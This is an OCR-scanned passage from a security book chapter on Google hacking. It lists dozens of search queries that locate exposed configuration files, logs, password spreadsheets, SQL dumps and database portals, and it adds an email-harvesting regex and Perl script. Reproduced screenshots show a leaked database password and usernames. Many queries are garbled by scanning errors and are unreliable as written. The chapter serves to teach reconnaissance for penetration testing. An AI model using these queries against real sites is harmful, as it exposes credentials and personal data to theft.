mrlg.cfg ##### Alter the ... www.onlamp.com/bsd/3UDD/09J31.Jmrtg.cfg - 7k - Cached - Similar papes Although this first search is not far off the mark, it's fairly common for even the best config file search to return page after page of sample or example files, like the sample MRTG configuration fUe shown in Figure 10.4. Figure 10.4 Sample Config Files Need Filtering O O O http://216.239. 39. 104/search7q=cache:Y...rchive/doc/mrtg/sample-mrtg.tfgft] fe^ |Glhttp://216.239.39.104/searcli7q=cache:Y'2z - (Inurlicfg OR Inurhconflg OR inurl: cor ©I # Multi Router Traffic Grapher — Example Configuration File ###################################################################### # f * copy this file to ../run and call it mrtg.cfg f * consider using . . /run /of gmaker to build your initial mrtg.cfg file # # This file is for use with mrtg-2.x # # Hots: # # * Keywords must start at the begin of a line. * # * Lines which follow a keyword line which do start # with a blank are appended to the keyword line # # * Empty Lioes are ignored # # * Lines starting with a # sign are comments. 0 ^Display a n www.syngress.com 294 Chapter 10 • Document Grinding and Database Digging This brings us back, once again, to perhaps the most valuable weapon in a Google hacker's arsenal: effective search reduction. Here's a list of the most common points a Google hacker considers when trolling for configuration files: ■ Create a strong base search using unique words or phrases fi-om live files . ■ Filter out the words sample, example, test, howto, and tutorial to narrow the obvious example files. ■ Filter out CVS repositories, which often house default config files, with —CVS. ■ Filter out manpage or Manual if you're searching for a UNIX program's configuration file. ■ Locate the one most commonly changed field in a sample configuration file and perform a negative search on that field, reducing potentially "lame" or sample files. To illustrate these points, consider the search file type: cfg mrtg "target[*]" -sample -CVS —example, which locates potentially live MRTG files. As shown in Figure 10.5, this query uses a unique string {"target[* ]") and removes potential example and CVS files, returning decent results. Figure 10.5 A Common Search Reduction Technique O O f3 Google Search: fi[etvpe:cfg mrtg "target[*]" -sample -cvs -example ^^^^h J ^ ^ j 1 ^ 1 [G]^ttp://www.goo9le.com/sear' " Or ^iiecype.<:fg mrtg "cargecl"]" -sample -cvs -example Web Imaoes GrouDS News Frooole more » \SS^^^ filetypexfg mrtg target[*| -sample -cvs -example , (^SeaT<:h3 Prafemncafi T] 1 1 1 Web R^ults 1 - 10 of about 147 for filetypeicfg mrtg '1arget[*]" -sample -cvs ^example. (0.32 seconds) u #XSize[ l:240YSizef ]: 60 Oplionsf ]: nopercent Colours ... ... var/www/html/Gache IconDIr: ../mrtg/ PageFoot^^]: .... - \ 7a WWW. syngress.com Document Grinding and Database Digging • Chapter 10 295 Some of the results shown in Figure 10.5 might not be real, live MRTG configuration files, but they all have potential, with the exception of the first hit, located in "/Squid-Book." There's a good chance that this is a sample file, but because of the reduction techniques we've used, the other results are potentially Hve, production MRTG configuration files. Wa rning »The filetype argument cannot be properly ORed at the time of this writing. This means that if you have a couple file extensions you need to ' search for in the same query, you should steer away from filetype and ^ lean more toward inurl, which ORs wonderfully! Table 10.1 Hsts a collection of searches that locate various configuration files. These entries are gathered from the many contributions to the GHDB.This list highlights the various methods that can be used to target configuration files. You'll see examples of CVS reduction, sample reduction, unique word and phrase isolation, and more. Most of these queries took imagination on the part of the creator and in many cases took several rounds of reduction by several searchers to get to the query you see here. Learn from these queries, and try them out for yourself. It might be helpfril to remove some of the qualifiers, such as —cvs or -sample, where applicable, to get an idea of what the "messy" version of the search might look like. Table 10.1 Configuration File Search Examples Query Program Information Exposure filetype :cfg ks intext: rootpw -sample -test -howto Anaconda Password filetype :conf inurl: firewall -intitle:cvs Firewall Config Files Varied inurl :ospfd.conf intext: password -sample -test -tutorial -download GNU Zebra Network data egg drop filetype: user user IRC Eggdrop Usernames, passwords, channels Continued www.syngress.com Chapter 10 • Document Grinding and Database Digging Table 10.1 Configuration File Search Examples Query Program Information Exposure LeapFTP intitle:"index.of ./" sites.ini modified LeapFTP client LILO inurl:lilo.conf filetype: conf password -tatercounter2000 -bootpwd -man filetype : cfg mrtg "target [ " M RTG S N M P -sample -cvs -example filetype : cn f my cn f -CVS -example filetype: in i inurl: perform.ini filetype: cfg autojnst.cfg Login credentials Password Community strings MySQL database mIRC filetype: conf ig con fig intext: appSettings "User ID" Usernames, passwords, database, path information Channel information, nicknames, passwords Mandrake auto-install Usernames, installed pack- ages, network settings .NET Web Application allinurl: ". nsconfig ' -howto -tutorial -sample Netscape Access Control Inurhodbc.ini ext:ini -cvs QDBC filetype:conf oekakibbs Qekakibss filetype : conf slapd. conf QpenLDAP inurl: "slapd. conf" intext: Q pen LDAP "credentials" -manpage -"Manual Page" -man: -sample inurl :"slapd.conf" intext: QpenLDAP "rootpw" -manpage -"Manual Page" -man: -sample intitle:index.of config.php PHP Inurhconfig.php dbuname PHP dbpass Inurhphp.ini filetype: in i PHP Connection strings Access information various Passwords Passwords, path informa- tion, application data Credentials rootdn credentials Usernames and passwords Usernames and passwords Usernames, passwords, hostnames, IP Continued www. syngress.com Document Grinding and Database Digging • Chapter 10 297 Table 10.1 Configuration File Search Examples Query Program Information Exposure filetypeiconf inurl: proftpd.conf -sample filetypexonf inurl: psybnc.conf " USER. PASS =" inurl: "smb. conf" intext: "workgroup" filetype:conf filetype:ini ServUDaemon Inurl :ssl. conf filetype:conf filetype: ini inurl: trillian. ini filetype:conf inurl: unrealircd.conf -cvs -gentoo Inurl :vtund. conf intext: pass -CVS filetype :rlw rlw filetype:r2w r2w filetype :r4w r4w filetype: ini ws ftp pwd PROFTP Server psyBNC Samba ServUDaemon SSL Trillian UnreallRCd Paths, log information, usernames Usernames, password Network information Setting information, user- names, passwords SSL data, various Usernames, passwords, buddy lists, e-mail addresses Server and client data, usernames, etc. Virtual Tunnel (vtund) Passwords WRQ Reflection WRQ Reflection WRQ Reflection WS FTP intitle: index. of ws_ftp.ini WSFTP Server connection settings Server connection settings Server connection settings Usernames, passwords, host information Usernames, passwords, host information Log Files Log files record information. Depending on the application, the information recorded in a log fde can include anything from timestamps and IP addresses to usernames and passwords — even incredibly sensitive data such as credit card numbers! Like configuration files, log fUes often have a default name that can be used as part of a base search. The most common fde extension for a log file is simply www. syngress.com 298 Chapter 10 • Document Grinding and Database Digging log, making the simplest base search for log files simply fiktype: log inurh.log or the even simpler extdog log. Remember that the ext (filetype) operator requires at least one search argument. Log file searches seem to return less sample and example files than configuration file searches, but search reduction is still required in some cases. Refer to the rules for configuration file reduction listed previously. Table 10.2 lists a collection of log file searches collected from the GHDB. These searches show the various techniques that are employed by Google hackers and serve as an excellent learning tool for constructing your own searches during a penetration test. Table 10.2 Log File Search Examples Query inurl: error.log filetype:log -cvs inurl: access.log filetype:log -cvs filetypeilog inurl :cache. log filetype:log inurhstore.log RELEASE filetype:log inurl -.access.log TCPHIT filetype : log inurl: useragent. log filetype:log hijackthis "scan saved" ext: log "Software: Microsoft Internet Information Services *.*" filetype: log iserrorlog intitle : index.of . bash history intitle:index.of .sh_history "Index of" I "chat/logs" filetype:log username putty filetype: log inurl: "password.log" filetype: log cron.log filetype: log access.log -CVS +htpasswd WS FTP LOG filetype: log "sets mode: +k" "sets mode: +s" intitle: "Index Of" -inurhmaillog maillog size www. syngress.com Program Apache error log Apache access log (Windows) Squid cache log Squid disk store log Squid access log Squid useragent log Hijackthis scan log IIS server log files MS Install Shield logs UNIX bash shell history file UNIX shell history file Chat logs Putty SSH client logs Password logs UNIX cron logs HTTPD server access logs WS_FTP client log files IRC logs, channel key set IRC logs, secret channel set Mail log files Continued Document Grinding and Database Digging • Chapter 10 299 Table 10.2 Log File Search Examples Query Program intext: "Session Start ■k -k -k filetypeilog filetype:cfg login "LoginServer=' ext. log password END_FILE ""ZoneAlarm Logging Client" filetypeilog "PHP Parse error" I "PHP Warning" \ " IRC/AIM log files Ultima Online log files Java password files ZoneAlarm log files PHP error logs Log files reveal various types of information, as shown in the search for file- typedog username putty in Figure 10.6. This log file lists machine names and asso- ciated usernames that could be reused in an attack against the machine. Figure 10.6 Putty Log Files Reveal Sensitive Data O O O http://64.2a3. 167. 104/searcli?q-cai:he:aMR...cs301/lecture&/cs301-20D2iai7.lDgfthl=en I I C I |C|Kittp://64,23i.l67.1G4;&earch?q=cache:aMRIP " Q.' filetypeilog usernarne putty 20m.' Q)| login as! nthe Sent □scrnajne Gtheya&ernie.c AncBsa denied ctheyaSernie.c = PuTTV log 2002.10.17 12:^^:21 bled ■edu's password ctheyailernie . cs Acce39 denied ctheya^ernie.ca Access denied ctheyaSernie.c3 Ancesa denied ctheyaSernie . cs Access denied ctheya^ernie.ca. .ed login as: ctheys Sent user name "ctheys" ctheya^ernie.Ga. .edu's password s Last login: Hhu Oct 17 11:37:18 20D2 from wiggins . eecs . ni Sun Hicrosystems Inc. SunOS 5.8 GeDeric Patch Octoh .edu's password: . edu ' s password ! PuTTV log 2002.10.17 12:3 This property The University of Department o£ Computer Science (CS). Unauthorized use is prohibited. Use is restricted to CS courscwork only! Office Documents The term office document generally refers to documents created by word pro- cessing software, spreadsheet software, and lightweight database programs. Common word processing software includes Microsoft Word, Corel WordPerfect, Mac Write, and Adobe Acrobat. Common spreadsheet programs include www. syngress.com 300 Chapter 10 • Document Grinding and Database Digging Microsoft Excel, Lotus 1-2-3, and Linux's Gnumeric. Other documents that are generally lumped together under the office document category include Microsoft PowerPoint, Microsoft Works, and Microsoft Access documents. Table 10.3 lists some of the more common office document file types, organized roughly by their Internet popularity (based on number of Google hits). Table 10.3 Popular Office Document File Types Extension File Type PDF Adobe Portable Document Format DOC Microsoft Word document TXT TEXT file XLS Microsoft Excel or Works spreadsheet PPT Microsoft PowerPoint RTF Rich Text Format document WP WordPerfect document WK1 Lotus 1-2-3 spreadsheet PS Microsoft Works word processor file MDB Microsoft Access database MCW, MW MacWrite file In many cases, simply searching for these files with filetype is pointless without an additional specific search. Google hackers have successfully uncovered all sorts of interesting files by simply throwing search terms such as private or password or admin onto the tail end o( a filetype search. However, simple base searches such as (inurhxls OR inurV.doc OR inurh.mdb) can be used as a broad search across many file types. Table 10.4 lists some searches from the GHDB that specifically target office documents. This list shows quite a few specific techniques that we can learn from. Some searches, such a$ filetype :xls inurtpassword.xls, focus on a fde with a specific name. The password.xls file does not necessarily belong to any specific software package, but it sounds interesting simply because of the name. Other searches, such a^ filetype:xls username password email, shift the focus from the file's name to its contents. The reasoning here is that if an Excel spreadsheet contains the words username password and e-mail, there's a good chance the spreadsheet contains sensitive data such as passwords. The heart and soul of a good Google search involves refining a generic search to uncover something extremely rele- www. syngress.conn Document Grinding and Database Digging • Chapter 10 301 vant. Google's ability to search inside different types of documents is an extremely powerful tool in the hands of an advanced Google user. Table 10.4 Sample Queries That Locate Potentially Sensitive Office Documents Query Potential Exposure rdbbwurub password email filetype:xls inurl: "password.xls" Passwords filetype:xls private Private data (use as base search) Inurl: admin filetypeixls Administrative data filetypeixls inurl .contact Contact information, e-mail addresses filetypeixis inurl: "email.xls" E-mail addresses, names allinurl: admin mdb Administrative database filetypeimdb inurhusers.mdb User lists, e-mail addresses Inurhemail filetypeimdb User lists, e-mail addresses Data filetypeimdb Various data (use as base search) Inurlibackup filetypeimdb Backup databases Inurl 1 profiles filetypeimdb User profiles Inurl i*db filetypeimdb Various data (use as base search) Database Digging There has been intense focus recently on the security of Web-based database appli- cations, specifically the front-end software that interfaces with a database. Within the security community, talk of SQL injection has all but replaced talk of the once- common CGI vulnerability, indicating that databases have arguably become a greater target than the underlying operating system or Web server software. An attacker wiU not generally use Google to break into a database or muck with a database front-end application; rather, Google hackers troU the Internet looking for bits and pieces of database information leaked from potentially vul- nerable servers. These bits and pieces of information can be used to first select a target and then to mount a more educated attack (as opposed to a ground-zero blind attack) against the target. Bearing this in mind, understand that here we do not discuss the actual mechanics of the attack itself, but rather the surprisingly www. syngress.com 302 Chapter 10 • Document Grinding and Database Digging invasive information-gathering phase an accomplished Google hacker will employ prior to attacking a target. Login Portals As we discussed in Chapter 8, a login portal is the "front door" of a Web-based application. Proudly displaying a username and password dialog, login portals generally bear the scrutiny of most Web attackers simply because they are the one part of an appUcation that is most carefuUy secured. There are obvious exceptions to this rule, but as an analogy, if you're going to secure your home, aren't you going to first make sure your front door is secure? A typical database login portal is shown in Figure 10.7. This login page announces not only the existence of an SQL Server but also the Microsoft Web Data Administrator software package. Figure 10.7 A Typical Database Login Portal Web Data Administrator - Login ^H^^^I^^^^^HI^^^^H ]■* ^ j 1 C 1 ^http://64.233.167.104/search?q=cach( - Or intitle:"Web Data Administrator - Login" Qj ^ J/VEB Data Administrator s ® Welcome to the Web Data Administrator. Please enter your SQL Server credentials: Username | | Server '{local) | A^Kentication @ WirK]^Ir,te,rate.] OSQLlugin 1^ Login j ^ Regardless of its relative strength, the mere existence of a login portal pro- vides a glimpse into the type of software and hardware that might be employed at a target. Put simply, a login portal is terrific for footprinting. In extreme cases, an unsecured login portal serves as a welcome mat for an attacker. To this end, let's look at some queries that an attacker might use to locate database front ends on the Internet. Table 10.5 lists queries that locate database front ends or inter- faces. Most entries are pulled from the GHDB. www. syngress.com Document Grinding and Database Digging • Chapter 10 303 Table 10.5 Queries That Locate Database Interfaces Query Potential Exposure "ClearQuest Web Logon" filetype:fp5 fp5 -"cvs log" filetype:fp3 fp3 filetype:fp7 fp7 "Select a database to view" intitle:"filemaker pro" "Welcome to YourCo Financial" "(C) Copyright IBM" "Welcome to Websphere" inurl: names. nsf?opendatabase inurl: "I catalog, nsf" intitle: catalog intitle: "messaging login" "© Copyright IBM" intitle: "Web Data Administrator - Login" intitle: "Gateway Configuration Menu" intitle: "oracle http server index" "Copyright * Oracle Corporation. " inurl: admin Jglobalsettings.htm inurl :pls/admin_/gateway. htm inurl:/pls/sample/admin_/help/ "phpMyAdmin" "running on" inurl: "main. php" "Welcome to phpMyAdmin" " Create new database' intitle: "index of Iphpmyadmin" modified intitle: phpMyAdmin "Welcome to phpMyAdmin * * * " "running on * as root® * " inurhmain.php phpMyAdmin intext:SQLiteManager inurhmain.php ClearQuest (CQWEB) FileMaker Pro FileMaker Pro FileMaker Pro FileMaker Pro IBM Websphere IBM Websphere Lotus Domino Lotus Domino Lotus Messaging MS SQL login Qracle Oracle HTTP Server Oracle HTTP Listener Oracle login portal Oracle default manuals phpMyAdmin phpMyAdmin phpMyAdmin phpMyAdmin phpMyAdmin SQLite Manager www. syngress.com Chapter 10 • Document Grinding and Database Digging Underground Googling Login Portals One way to locate login portals is to focus on the word login. Another way is to focus on the copyright at the bottom of a page. Most big-name portals put a copyright notice at the bottom of the page. Combine this with the product name, and a welcome or two, and you're off to a good start. If you run out of ideas for new databases to try, go to http://labs.google.com/sets, enter oracle and mysql, and click Large Set for a list of databases. Support Files Another way an attacker can locate or gather information about a database is by querying for support files that are installed with, accompany, or are created by the database software. These can include configuration files, debugging scripts, and even sample database files. Table 10.6 lists some searches that locate specific sup- port files that are included with or are created by popular database clients and servers. Table 10.6 Queries That Locate Database Support Files Query inurhdefault content.asp ClearQuest intitle: "index of" intext:globals.inc filetypeiinc intext:mysql_connect filetypeiinc dbconn intitle: "index of" intext.connect.inc filetype: properties inurhdb intext: password Description ClearQuest Web help files MySQL globals.inc file, lists connection and credential information PHP MySQL Connect file, lists connec- tion and credential information Database connection file, lists connec- tion and credential information MySQL connection file, lists connection and credential information db. properties file, lists connection information Continued Document Grinding and Database Digging • Chapter 10 305 Table 10.6 Queries That Locate Database Support Files Query intitle: "index of" mysqi.conf OR mysqijconfig inurhphp. ini filetype:ini filetype:ldb admin inurl:config.plip dbuname dbpass intitle: index. of config.php "phpinfo.php" -manual intitle: "index of" +myd size filetype:cnf my.cnf -cvs -example filetype:ora ora filetype:pass pass intext:userid filetype:pdb pdb backup (Pilot I Pluckerdb) Description MySQL configuration file, lists port number, version number, and path information to MySQL server PHP.INI file, lists connection and cre- dential information Microsoft Access lock files, list database and username The old config.php script, lists user and password information The config.php script, lists user and password information The output from phpinfo.php, lists a great deal of information The MySQL data directory The MySQL my.cnf file, can list infor- mation, ranging from paths and database names to passwords and usernames QRA configuration files, list Qracle database information dbman files, list encoded passwords Palm database files, can list all sorts of personal information As an example of a support file, PHP scripts using the mysql_connect fianction reveal machine names, usernames, and cleartext passwords, as shown in Figure 10.8. Strictly speaking, this file contains PHP code, but the INC extension makes it an include file. It's the content of this file that is of interest to a Google hacker. www. syngress.com 306 Chapter 10 * Document Grinding and Database Digging Figure 10.8 PHP Files Can Reveal Machine Names, Usernames, and Passwords y ^ - ] I C ] |G|li1tp:;764. 233.167, lQ4/sear<:h?q=cai:lie:2TkTVI: - Q' filetvpe:iii<: iiUgxtimy^qLconnect O O O http://64.233. 167.104/search?q=cache:2Tk...W6N4J:ii ^i:am/daja/db.inc&hl=en req\iire_ODce< "conunoD . ioc" } ; // functioD dbConnecttl < SdbBandle - 6in,ysql_connect [ "localhost " , "rbrooks", "2167"! ; if [ ! SdbBandle 1 < showDBErroi: ( "Unable to connect to the database management system" exit ( ) ; > if [ ! ■Smy3ql_select_db ( '"'tmob'" ) ] ( showDBError ( "Unable to connect to the database") ; exit ( 1 J > // function dbErrorConnectf 3 ( SdbBandle - 6in,ysql_connect [ "localhost " , "rbrooks", "bad" J j if [ ! SdbBandle ) ( showDBErrort "Unable to connect to the database management system" > if [! ^my3ql_select_dbi "error" 1 ) { showDBError ( "Unable to connect to the database") j > // i J Error Messages As we've discussed throughout this book, error messages can be used for all sorts of profiling and information-gathering purposes. Error messages also play a key role in the detection and profiling of database systems. As is the case with most error messages, database error messages can also be used to profile the operating system and Web server version. Conversely, operating system and Web server error messages can be used to profile and detect database servers. Table 10.7 shows queries that leverage database error messages. Table 10.7 Queries That Locate Database Error Messages Query Description intitle: "Error Occurred While Processing Request" intitle: "Error Occurred" "The error occurred in" filetypeicfm "detected an internal error [IBM] [CLI Driver][DB2/6000]" ColdFusion error message, can reveal SQL statements and server information ColdFusion error message, can reveal source code, full pathnames, SQL query info, database name, SQL state informa- tion, and local time information DB2 error message, can reveal pathnames, function names, filenames, partial code, and program state Continued www. syngress.com Document Grinding and Database Digging • Chapter 10 307 Table 10.7 Queries That Locate Database Error Messages Query Description An unexpected token "END-OF-STATEMENT" was found "Error Diagnostic Information" int it le: "Error Occurred While" "You have an error in your SQL syntax near" "MySQL error with query" "supplied argument is not a valid MySQL result resource" "QRA- 1 254 1 : TNS: no listener" intitle: "error occurred" "Warning: pg connectQ: Unable to connect to PostgreSQL server: FATAL' "QRA-00921: unexpected end of SQL command" "QRA-00933: SQL command not properly ended" "QRA-00936: missing expression" "PostgreSQL query failed: ERRQR: parser: parse error" "Supplied argument is not a valid PostgreSQL result" "Unclosed quotation mark before the character string" "Incorrect syntax near" DB2 error message, can reveal pathnames, function names, filenames, partial code, and program state Generic error message, reveals various information Generic SQL message, can reveal pathnames and partial SQL code MySQL error message, reveals various information MySQL error message, reveals real pathnames and listings of other PHP scripts on the server Qracle error message, reveals SQL code, pathnames, filenames, and data sources Postgresql error message, reveals path information and database names Qracle SQL error message, reveals full Web pathnames and/or php filenames Qracle SQL error message, reveals pathnames, function names, filenames, and partial SQL code Qracle SQL error message, reveals path- names, function names, filenames, and partial SQL code PostgreSQL error message, can reveal pathnames, function names, filenames, and partial code PostgreSQL error message, can reveal pathnames, function names, filenames, and partial code SQL error message, can reveal pathnames, function names, filenames, and partial code SQL error message, can reveal path- names, function names, filenames, and partial code Continued WWW. syngress.com 308 Chapter 10 • Document Grinding and Database Digging Table 10.7 Queries That Locate Database Error Messages Query Description "Incorrect syntax near" -the "access denied for user" "using password" "Can't connect to local" intitle: warning SQL error message, can reveal path- names, function names, filenames, and partial code (variation) SQL error message, can reveal pathnames, function names, filenames, and partial code (variation) SQL error message, can reveal pathnames, function names, filenames, and partial code (variation) In addition to revealing information about the database server, error messages can also reveal much more dangerous information about potential vulnerabilities that exist in the server. For example, consider an error such as "SQL command not properly ended", displayed in Figure 10.9. This error message indicates that a ter- minating character was not found at the end of an SQL statement. For example, if a command accepts user input, an attacker could leverage the information in this error message to execute an SQL injection attack. Figure 10.9 The Discovery of a Dangerous Error Message I Cl http://64.233. 167. 104/search?q=cdche:Ua055xfk6ZIJ:ww " Q-' "SQL command not properly ended" filetype:cfm Srror Occurred While Proce^siiig Request IrroT Di^nostic Infonnation Oracle EnorCode = 933 ORA-00933: SQL coininand not properly ended^ SQL = ' SELECT headline, contact, textbody.newsiraagc.iinagecaption FROM news WHEEJEnewsid = 150AHtscaich= Data Source = "BACKOFFICE" The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (101:3) to (101:53) in the Icmplalc flic /ranl/diskl/htdocs/agpa2001/ncws/instruction.cfm. Date/Time: Sat Mar 27 14:30:28 2004 Browser: Googlcbot/2.1 (+http://www.£ooglcbot.oom/botJitral) Remote Addtcss: 54. Tiety String: curTcntanicle=150%C2%A4tsearch= WWW. syngress.com Document Grinding and Database Digging • Chapter 10 309 Database Dumps The output of a database into any format can be constituted as a database dump. For the purposes of Google hacking, however, we'll us the term database dump to describe the text-based conversion of a database. As we'U see next in this chapter, it's entirely possible for an attacker to locate just about any type of binary database file, but standardized formats (such as the text-based SQL dump shown in Figure 10.10) are very commonplace on the Internet. Figure 10.10 A Typical SQL Dump O O O http://S4.233.167.104/search?q=^caehe:Ez.„s.sqr+"9623DLjmping-+-data+fDr+-table*'&hl=i [ e ] ^ http://64.233.167.104/&ear<:h?q=caclie:azpgv " Q.'- "#Dumping data for table' ■ Tobls strjcture for table "artists' CHEATE TABLE artists ( alD int[5l unsigned NDT HULL default last char [30) WOT IMULL default "", first char (30) HOI HULL default ■', utl char (80) HUT HULL default PRIMARY KEY (alDJ 1 TYPE=HyIEAM; — Dumpiog data for table 'artists' — fable strjctuEe for table 'blabs' CREATE Tfl-DLE blobs ( id int(9] jnaigned NOT NULL default '0', type tinyint[2) unsigned HOT HULL default '0', body text HOT HULL, PHIHRHY KEY (id, type], FULLTEXT KEY body [body) Using a fuU database dump, a database administrator can completely rebuild a database. This means that a fuU dump details not only the structure of the database's tables but also every record in each and every table. Depending on the sensitivity of the data contained in the database, a database dump can be very revealing and obviously makes a terrific tool for an attacker. There are several ways an attacker can locate database dumps. One of the most obvious ways is by focusing on the headers of the dump, resulting in a query such as "#Dumping data for table", as shown in Figure 10. 10. This technique can be expanded to work on just about any type of database dump headers by simply focusing on headers that exist in every dump and that are unique phrases that are unlikely to produce false positives. Specifying additional specific interesting words or phrases such as username, password, or user can help narrow this search. For example, if the word password www. syngress.com 310 Chapter 10 • Document Grinding and Database Digging exists in a database dump, there's a good chance that a password of some sort is listed inside the database dump. With proper use of the OR symbol ( | ), an attacker can craft an extremely effective search, such as "# Dumping data for table (user I username \ pass | password). In addition, an attacker could focus on file extensions that some tools add to the end of a database dump by querying for Jiletype:sql sql and further narrowing to specific words, phrases, or sites. The SQL file extension is also used as a generic description of batched SQL commands. Table 10.8 lists queries that locate SQL database dumps. Table 10.8 Queries That Locate SQL Database Dumps Query inurhnuke filetypeisql filetype:sql password filetype:sql "IDENTIFIED BY" -cvs "# Dumping data for table (username \ user \ users \ password) "#mysql dump" filetypeisql "# Dumping data for table" "# phpMyAdmin MySQL-Dump" filetypeitxt "# phpMyAdmin MySQL-Dump" "INSERT INTQ" -"the" Description php-nuke or postnuke CMS dumps SQL database dumps or batched SQL commands SQL database dumps or batched SQL commands, focus on "IDENTIFIED BY", which can locate passwords SQL database dumps or batched SQL commands, focus on interesting terms SQL database dumps SQL database dumps SQL database dumps created by phpMyAdmin SQL database dumps created by phpMyAdmin (variation) Actual Database Files Another way an attacker can locate databases is by searching directly for the database itself. This technique does not apply to aU database systems, only those systems in which the database is represented by a file with a specific name or extension. Be advised that Google wiU most likely not understand how to pro- cess or translate these files, and the summary (or "snippet") on the search result page wiU be blank and Google wiU list the file as an "unknown type," as shown in Figure 10. 11. www. syngress.com Document Grinding and Database Digging • Chapter 10 311 Figure 1 0.1 1 Database Files Themselves Are Often Unknown to Google O O O Google Search: filetype:rndb siteicom jj^-^ ■-•~| I C I [G|http://www.goQgle.cQm/5edr<:h?q=filetvpe:i " Qj f1letype:mdb sileicQm Google Web Images Groups News Froogle more » |flletvpe:nndb sltexom f Web Results 1 - 1D of about 4,000 for fi I etypeimdb site: com. (O.ISseconds) www.selinc.eommp/pe-software/SEL-5010/settlnqs/Exaniple%20387A%20SVtM^ MDB Similar paq&s www.members Iripnd.conn/nickjenkins/pmqram/leslinq/defectDB.nndb File Format: Unrecognized - View as HTML Similar pao&s www.redtechpress.conn/GiveCQ Fixed. mdb File Format: Unrecognized - View as HTML Similar paoss www.eafesoft.eonn/produets/eams/does^admin/LoqinConfiquration/SampleJdbcLoqin mdb Unrecognized - View as HTML If Google does not understand the format of a binary fde, as with many of those located with the fiktype operator, you will be unable to search for strings within that file. This considerably limits the options for effective searching, forcing you to rely on inurl or site operators instead. Table 10.9 hsts some queries that can locate database fries. Table 10.9 Queries That Locate Database Files Query filetypeicfm "cfapplication name password filetypeimdb inurhusers.mdb inurhemail filetypeimdb inurhbackup filetypeimdb inurliforum filetypeimdb inurlildblmain.mdb inurl I profiles filetypeimdb filetypeiasp DBQ=" * Server. MapPath("*.mdb") allinurli admin mdb Description ColdFusion source code Microsoft Access user database Microsoft Access e-mail database Microsoft Access backup databases Microsoft Access forum databases ASP-Nuke databases Microsoft Access user profile databases Microsoft Access database connection string search Microsoft Access administration databases www. syngress.com 312 Chapter 10 • Document Grinding and Database Digging Automated Grinding Searching for files is fairly straightforward — especially if you know the type of file you're looking for. We've already seen how easy it is to locate fdes that con- tain sensitive data, but in some cases it might be necessary to search files offline. For example, assume that we want to troU for yahoo.com e-mail addresses. A query such as "@yahoo.com" email is not at all effective as a Web search, and even as a Group search it is problematic, as shown in Figure 10.12. Figure 10.12 A Generic E-IVlail Search Leaves IVluch to Be Desired Google Search: "@/ahoo.com" email [ C ] |G|littp://group5.gQQgle.cQm/grQijps?q=^Z2g^QvaliQQ.com; ' Or "igyahQQ.com" emai] jr~^. I Web images Groups News Frooale more » |T GroupsO T Groups Results 1 - 10 of about 2, 590, ODD for "i@ vahQO . CQm " email . (0.2B seconds) Sorted by relevance Sort by date Related groups: news.admin.net-abuse.siohtings I Sponsored Links [email] (forward.net^/store .yahoo.com/forward.net) 2002 Norton ... c9i-bin/clink?platinum-deals-i-phycv>;-i-noran.html is hosted by: store.vahoo.com The w/Free Dell Laotoo Evaluated images in this spam are hosted at: http://sweptawaytravel.com/emallyl36/norton ... , .. ^ . t''. . J ■ * L, ' UA.' A.^^ r-trtrU L, ^ A x>- J ^- \ 1 keep It. No cost shipping. Aff. news. admin. net-abuse. sightings - Oct 17, 21302 by Spam Avenger - View Thread n article! . « _ ^ „ ^ ' .J I" V 1^ f www.couponsandoffers.com [emain iq65 83@vahoo.com: Re: Hello! See yoiir message here... ... ID: Reply-To; Robert ■schromaticpro@yahoo.com> MIME-Version ... S.gt;'=A href="http://sil12345.com/remedy;adv193/? yuTgqdeCzG">Email-> ... news.admin.net-abuse.siohtinos - Jun 9. 2003 by Seth Breidbart - View Thread f1 articled [emain UCE: PRESS RELEASE \ rennoral30Q34@vahoo.com \ aHanta2. .■■ ... 12:18:41 Status: RO X-Status: X-Ksy words : X-U ID: 1 For Immediate Rei ease For Further Information Contact Email: marketingbyemaii@yahoo.com Email maiiboxes to ... news.admin.net-abuse.siohtinQS - Jan 1, 2002 by TPFH - View Thread f1 articled I This search located one e-mail address, jg 6 5 _83@Yahoo.com, hut also keyed on store.yahoo.com, which is not a valid e-mail address. In cases like this, the best option for locating specific strings lies in the use of regular expressions. This involves downloading the documents you want to search (which you most likely found with a Google search) and parsing those files for the information you're looking for. You could opt to automate the process of downloading these files, as we'U show in Chapter 12, but once you have downloaded the files, you'll need an easy way to search the files for interesting information. Consider the following Perl script: www. syngress.com Document Grinding and Database Digging • Chapter 10 313 # ! /usr/bin/perl # # Usage: ./ssearch.pl FILE_TO_SEARCH WORDLIST # # Locate words in a file, coded by James Foster # use strict; open(SEARCHFILE, $ARGV[0] ) || dieC'Can not open searchfile because $ ! " ) ; open (WORDFILE, $ARGV[1] ) || die("Can not open wordfile because $ ! " ) ; my @WORDS=; close (WORDFILE) ; my $LineCount = 0 ; while () { foreach my $word (©WORDS) { chomp ( Sword) ; ++$LineCount ; if(m/$word/) { print " $&\n" ; last ; } } } close (SEARCHFILE) ; This script accepts two arguments: a file to search and a list of words to search for. As it stands, this program is rather simplistic, acting as nothing more than a glorified grep script. However, the script becomes much more powerful when instead of words, the word list contains regular expressions. For example, consider the following regular expression, written by Don Ranta: [a-zA-ZO-9 ._-] +@ ( ( [a-zA-Z0-9_-] {2, 99}\ . ) + [a-zA-Z] {2 , 4} ) | ( (25 [0-5] | 2 [0- 4]\d|l\d\d| [1-9] \d| [1-9] ) \ . (25 [0-5] | 2 [ 0-4 ] \d | l\d\d | [ 1-9 ] \d | [ 1-9 ] ) \ . ( 25 [ 0- 5] |2[0-4]\d|l\d\d| [1-9] \d| [1-9] ) \ . (25 [0-5] | 2 [ 0-4 ] \d | l\d\d | [ 1-9 ] \d | [ 1-9 ] ) ) Unless you're somewhat skilled with regular expressions, this might look like a bunch of garbage text. This regular expression is very powerful, however, and will locate various forms of e-mail address. 314 Chapter 10 • Document Grinding and Database Digging Let's take a look at this regular expression in action. For this example, we'U save the results of a Google Groups search for "@y ahoo.com" email to a file called results. html, and we'U enter the preceding regular expression all on one line of a file called wordlfile.txt. As shown in Figure 10.13, we can grab the search results from the command line with a program like Lynx, a common text-based Web browser. Other programs could be used instead of Lynx — Curl, Netcat, Telnet, or even "save as" from a standard Web browser. Remember that Google's terms of service frown on any form of automation. In essence, Google prefers that you simply execute your search from the browser, saving the results manually. However, as we've discussed previously, if you honor the spirit of the terms of service, taking care not to abuse Google's free search service with excessive automation, the folks at Google wiU most likely not turn their wrath upon you. Regardless, most people wiU ultimately decide for themselves how strictly to follow the terms of service. Back to our Google search: Notice that the URL indicates we're grabbing the first hundred results, as demonstrated by the use of the num=iOO parameter. This will potentially 